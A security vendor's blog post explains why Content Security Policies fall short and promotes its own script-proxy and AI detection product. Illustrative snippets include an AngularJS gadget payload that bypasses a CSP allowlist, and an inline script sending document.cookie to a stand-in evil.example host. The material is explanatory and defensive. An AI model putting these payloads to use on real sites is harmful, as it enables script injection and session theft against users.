
Why CSPs Are Not Enough

Thursday, June 6th, 2024

Updated May 25th, 2024

Carlo D'Agnolo

Content Security Policies (CSPs), specified and promoted by the W3C, are a browser-side feature designed to enhance web security. If implemented correctly, with specific rules per page, they can provide substantial security benefits.
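For reference, a CSP is delivered as an HTTP response header (or a meta tag). A reasonably strict per-page policy might look like the following; all domains here are hypothetical:

```http
Content-Security-Policy: default-src 'self'; script-src 'self' https://js.payments.example; style-src 'self'; frame-ancestors 'none'; report-uri /csp-reports
```

Each directive scopes one resource type, and anything not explicitly allowed is blocked. The catch, as we'll see, is keeping a list like this accurate on every page.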

However, in practice, they tend to be cumbersome to set up, frequently break during local development, and risk taking down sites when scripts change after years of stability.

The max header length limitation often results in wildcard rules, diluting their effectiveness. Much like DNSSEC, CSPs tackle a valid problem with a poorly executed solution, often leading developers to abandon them entirely. The core issue remains unaddressed in the CSP3 specification.
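For example (domains hypothetical), a policy that starts out pinning exact script URLs tends to degrade into host-wide or even scheme-wide allowances once the header budget runs out:

```http
# Intended: allow only specific, reviewed scripts
Content-Security-Policy: script-src 'self' https://js.vendor-a.example/v2/tag.js

# What often ships instead: whole hosts, or any HTTPS origin at all
Content-Security-Policy: script-src 'self' https://*.vendor-a.example https:
```

A `script-src` that includes `https:` permits scripts from any HTTPS origin, which offers essentially no protection against third-party script attacks.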

The Bad of CSPs

They’re Tricky to Set Up And Maintain

CSPs require meticulous configuration to be effective, presenting a significant challenge, especially in dynamic web environments. New scripts, APIs, or content delivery networks are continuously integrated into websites, necessitating frequent updates to CSPs. This fluidity adds a layer of complexity and maintenance that can be overwhelming for developers, particularly in large-scale or rapidly evolving projects.
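To illustrate the churn: adding a single new vendor tag (hypothetical domains below) forces a header change, a deploy, and a re-test of every page the policy covers, and the vendor's own downstream loads may require yet more entries:

```http
# Before
Content-Security-Policy: script-src 'self' https://js.payments.example

# After adding one tag manager, which itself loads scripts from a second host
Content-Security-Policy: script-src 'self' https://js.payments.example https://tags.vendor.example https://cdn.vendor.example
```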

Performance is Lacking

The implementation of CSPs introduces additional computational overhead. Every request must be checked against the policy, potentially delaying the loading of resources and impacting user experience. For e-commerce in particular, even minimal increases in load time correlate directly with user dissatisfaction and drop-off rates. Balancing security measures with performance needs is a critical, yet often challenging, aspect of using CSPs.

Browsers Are Not Uniform

The effectiveness of CSPs is also hampered by inconsistent support across different web browsers. Not all CSP directives are universally recognized or interpreted in the same way by every browser, leading to potential security loopholes. Developers must therefore craft CSPs that not only meet security requirements but also consider the peculiarities of browser behavior, complicating the deployment and testing phases.

Techniques to Circumvent CSPs

Sophisticated attackers have devised numerous methods to bypass CSPs. Common tactics include exploiting script sources that are too broadly defined within CSPs, leveraging whitelisted domains to serve malicious scripts, or manipulating CSP tokens like nonces and hashes. These vulnerabilities necessitate a more nuanced approach to defining and enforcing CSPs, emphasizing the need for stringent, context-aware policies.
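As a sketch of the whitelisted-domain tactic: if a policy allows an entire public CDN, an attacker with an HTML injection point can load a known "script gadget" library from that trusted host and execute code without ever violating the policy. The URLs and payload below are purely illustrative of this well-documented class of bypass:

```html
<!-- Active policy: script-src 'self' https://cdn.public-example.com -->
<!-- Attacker-injected markup: the script loads from an allowed host, so the
     CSP permits it, and the library's template engine then evaluates
     attacker-controlled expressions. -->
<script src="https://cdn.public-example.com/angularjs/1.0.8/angular.min.js"></script>
<div ng-app>{{ constructor.constructor('alert(document.domain)')() }}</div>
```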

CSPs are also subject to a maximum header length, which means that on many sites 3rd-party script URLs are too long to list individually and, as a result, the full domain gets allowlisted.

Managing False Positives and Alert Fatigue

The flood of violation reports generated by CSPs, particularly in 'report-only' mode, can overwhelm security teams with false positives. Distinguishing between genuine security threats and benign anomalies requires sophisticated analysis tools and processes. Without effective management strategies, the risk of alert fatigue is high, potentially causing critical alerts to be overlooked or ignored.
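As a sketch of one mitigation (not a complete tooling recommendation), violation reports can at least be deduplicated before a human looks at them. The report shape below follows the JSON body browsers POST to a `report-uri` endpoint; the URLs are made up:

```python
import json
from collections import Counter

# Hypothetical sample of CSP violation reports, in the JSON shape
# browsers POST to a report-uri endpoint.
raw_reports = [
    '{"csp-report": {"document-uri": "https://shop.example/checkout", "blocked-uri": "https://cdn.example/app.js", "violated-directive": "script-src"}}',
    '{"csp-report": {"document-uri": "https://shop.example/checkout", "blocked-uri": "https://cdn.example/app.js", "violated-directive": "script-src"}}',
    '{"csp-report": {"document-uri": "https://shop.example/", "blocked-uri": "https://evil.example/skim.js", "violated-directive": "script-src"}}',
]

def dedupe(reports):
    """Collapse repeated reports into (blocked-uri, directive) counts."""
    counts = Counter()
    for raw in reports:
        body = json.loads(raw)["csp-report"]
        counts[(body["blocked-uri"], body["violated-directive"])] += 1
    return counts

summary = dedupe(raw_reports)
# A rare blocked URI is far more interesting than a noisy repeat offender.
for (uri, directive), n in summary.most_common():
    print(f"{n}x {directive}: {uri}")
```

Even a simple aggregation like this separates one-off anomalies (often the real incidents) from recurring noise, which is the first step against alert fatigue.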


The More Secure Path

Despite all the above complaints, CSPs are still a good way to secure your site. They just shouldn’t be the only security measure against 3rd-party JavaScript attacks. Our comparison page gives a great overview of the features we have implemented on top of CSPs to provide the strongest possible protection against 3rd-party script breaches.

We believe the key lies in analyzing the entire script before it reaches the user's browser. Naturally, this presents a few challenges, for which we have engineered solutions.

100% Coverage, Proxy and Inline Scripts

We ensure that all scripts are reviewed before they reach the user’s browser. We do this by proxying them, which lets us see the exact code the browser fetches. This makes full code analysis possible, with the certainty that we are analyzing the same code the user’s browser will receive.
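This is not c/side's actual pipeline, but the core idea of guaranteeing that the analyzed code and the served code are identical can be sketched with a content hash over the exact bytes the proxy delivers:

```python
import hashlib

def fingerprint(script_body: bytes) -> str:
    """Hash the exact bytes served to the browser so any change is detectable."""
    return hashlib.sha256(script_body).hexdigest()

# Hypothetical third-party script: as reviewed, as later served unchanged,
# and as served after tampering.
reviewed = fingerprint(b"console.log('analytics v1');")
served   = fingerprint(b"console.log('analytics v1');")
tampered = fingerprint(b"console.log('analytics v1'); fetch('//evil.example');")

print(served == reviewed)    # the unchanged script matches the reviewed version
print(tampered == reviewed)  # any modification no longer matches
```

Because the proxy sits between the third party and the user, even a byte-level change to a "stable" script is visible before it executes.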

We do this by offering a tiny script that’s placed first in your website header. Instead of adding latency, in most cases we can even optimize the scripts through caching, so our proxy improves performance more often than not.

On certain plans we also provide inline script detections. These scripts are embedded directly within HTML, as opposed to those loaded from external sources through JavaScript. They are often a target for cross-site scripting (XSS) attacks and can execute malicious code when a user visits a web page.
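For context, CSP's own answer to inline scripts is nonces: the server generates a fresh random token per response, and only inline scripts carrying it may run. The values and function names below are illustrative:

```html
<!-- Response header: Content-Security-Policy: script-src 'nonce-rAnd0mV4lue' -->
<script nonce="rAnd0mV4lue">initCheckout();</script>  <!-- nonce matches: allowed -->
<script>new Image().src='//evil.example/?c='+document.cookie;</script>  <!-- no nonce: blocked -->
```

Nonces help, but they only work if every legitimate inline script is templated server-side, which is exactly the kind of meticulous setup many sites fail to maintain.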

The Use of AI

C/side monitors over 60 attributes and uses AI to flag indicators of malicious intent in real time. Our solution also takes historical context into account: changes over time get reviewed, making it easier to spot sudden hijacks. We feed all historical data back into our AI and LLM to further bolster our detection mechanisms.

On top of that, we use AI to parse the code of 3rd-party scripts in real time. Combining our defined detection mechanisms with AI means we can spot an attempt in milliseconds and shut it down before any malicious operation runs, or alert you if dangerous behavior arises.

The result: malicious code never touches your user’s browser.